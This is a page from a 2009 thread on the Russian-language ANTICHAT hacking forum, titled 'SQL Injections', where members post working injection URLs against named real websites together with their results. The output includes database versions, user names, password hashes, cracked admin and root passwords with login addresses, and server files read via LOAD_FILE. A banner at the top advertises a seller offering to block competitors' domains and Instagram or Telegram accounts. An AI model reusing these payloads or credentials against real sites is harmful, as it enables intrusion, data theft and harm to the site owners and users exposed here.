УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 816 из 1242

816

Опции темы

Поиск в этой теме

Опции просмотра

#8151

05.03.2009, 02:00

viaman

Новичок

Регистрация: 27.11.2008

Сообщений: 4

Провел на форуме:
52419

Репутация: 3

http://ictnieuws.educos.nl/detail.php?ID=-1+union+all+select+0,1,group_concat(0x3a,user_id,0 x3a,username,0x3a,userpass),3+from+educos.poll_use r--
Louis:3ca70a4c295483a97698770bc683b11d ------>eiken

#8152

05.03.2009, 02:27

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

http://www.pap.ro/detaliu.php?id=-117+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11

Database Version: 4.1.22-standard
Database name: pap_pap
User name: pap_pap@localhost

#8153

05.03.2009, 03:18

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

http://www.booknow.biz/display.php?id=20766+union+select+1,2,3,concat(a_n ame,0x3a,a_passwd),5+from+admins/*

есть users

ичо 1 biz )

#8154

05.03.2009, 03:27

f1ng3r

Участник форума

Регистрация: 14.01.2009

Сообщений: 257

Провел на форуме:
1936181

Репутация: 688

Отправить сообщение для f1ng3r с помощью ICQ

Pagerank: 6
тИЦ: 650

Код:

http://www.kond.ru/news.php?newsid=-1+union+select+1,2,conca t_ws(0x3a,v ersion(),database(),user()),4--

Database Version : 5.0.27-log
Database name : wwwkondru
User name : akseon@localhost

----------------------------------------------------------------+

Pagerank: 5
тИЦ: 750

Код:

http://www.ukrmebel.com/ShopNews.php?NewsId=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,ve rsion( ),database(),user()),0x71),0x71),4,5,6--

Database Version : 5.0.16
Database name : mebel
User name : mebel@localhost

----------------------------------------------------------------+

Pagerank: 5
тИЦ: 600

Код:

http://www.matress.ru/prod1.php?pID=-1+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33--&proizv=290&vID=70

Database Version : 5.0.67-log
Database name : u12715
User name : u12715@10.9.11.32

#8155

05.03.2009, 09:48

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=@@version--&cl=np_apps&lng=en

Version : Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2

http://www.networkpower.exide.com/products/range_select.asp?range=S300&sub_id=-7+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(SELECT+ALL+T OP+x+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))--&cl=np_apps&lng=en

x=1....127

Последний раз редактировалось Gorev; 05.03.2009 в 09:56..

#8156

05.03.2009, 10:23

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

Провел на форуме:
1686744

Репутация: 246

Отправить сообщение для S0ulVortex с помощью ICQ

www.ebenformayor.com

Код:

http://www.ebenformayor.com/news.php?ax=v&n=23&id=6&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

version: 5.0.45-log
user: ebenform_user@cgi0605.int.bizland.net
database: ebenform_cms

#8157

05.03.2009, 13:33

Assembler

Участник форума

Регистрация: 01.09.2007

Сообщений: 203

Провел на форуме:
812964

Репутация: 302

Отправить сообщение для Assembler с помощью ICQ

Код:

http://www.mona-liza.com

PR: 3
Тиц: 50
Версия: 4.0.27-log
База данных: mona-liza
Юзверь: mona-liza@zvm17.host.ru

Код:

http://www.mona-liza.com/act.php?id=-1%20union%20select%201,2,3,4,5--

Сай монны лизы =))

#8158

05.03.2009, 14:06

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

Провел на форуме:
3152874

Репутация: 1020

Отправить сообщение для AkyHa_MaTaTa с помощью ICQ

www.esd.lv PR-5

PHP код:


		
			
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,user(),user,password,host,file_priv),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user--+

root@localhost:root:*95C79488BBFA161B765760B9654AA A544D1ABB1C:localhost:Y

сервак судя по путям на wamp - C:\wamp\www\index.php

PHP код:


		
			
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,LOAD_FILE(0x433a5c77616d705c7777775c61646d696e5c696e6465782e706870),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

PHP код:


		
			
http://www.esd.lv/inner.php?left=490&left2=491+union+select+1,2,3,4,5,concat_ws(0x3A,login,parole),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+esd.lietotaji+where+admin=1--+

admin:gruutaa_1981
http://www.esd.lv/admin/

elt.pearsoned.it Pr-5

PHP код:


		
			
http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(concat_ws(0x3a,user(),@@version,database()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+

user:root@localhost
version: 4.1.15-standard
db:catalogo

PHP код:


		
			
http://elt.pearsoned.it/schedaopera/scheda_opera.php?ID=-1+union+select+1,unhex(hex(LOAD_FILE(0x2f686f6d65322f7765622f656c742f5f617574682e706870))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34--+

root:augusto

Последний раз редактировалось AkyHa_MaTaTa; 05.03.2009 в 16:06..

#8159

05.03.2009, 17:26

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26

Database Version: 4.1.22-standard-log
Database name: hondab_honda
User name: hondab_fix@localhost

http://www.honda-bikes.ro/interior.php?cat=4&id=-103+UNION+SELECT+1,2,3,4,5,6,CONCAT_WS(0x3a,user_e mail,user_id,user_password,username),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26+FROM+php bb_users+LIMIT+1,1

andu@zeppelindesign.com:2:f6fdffe48c908deb0f4c3bd3 6c032e72:admin

f6fdffe48c908deb0f4c3bd36c032e72=adminadmin

#8160

05.03.2009, 18:27

~~faza02~~

Banned

Регистрация: 21.11.2007

Сообщений: 181

Провел на форуме:
1066435

Репутация: 1013

Код:

http://www.dddb.net/php/latestnews_Linked.php?id=-526+union+select+AES_DECRYPT(AES_ENCRYPT(version(),1),1),2,3,4/*

4.1.14-Debian_5-log

http://search.msn.com/results.aspx?q=IP%3A208.113.142.65&FORM=MSNH
неплохо..
раскрытие путей:

Код:

/home/.dalai/dddb/dddb.net/php

Страница 816 из 1242

816

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход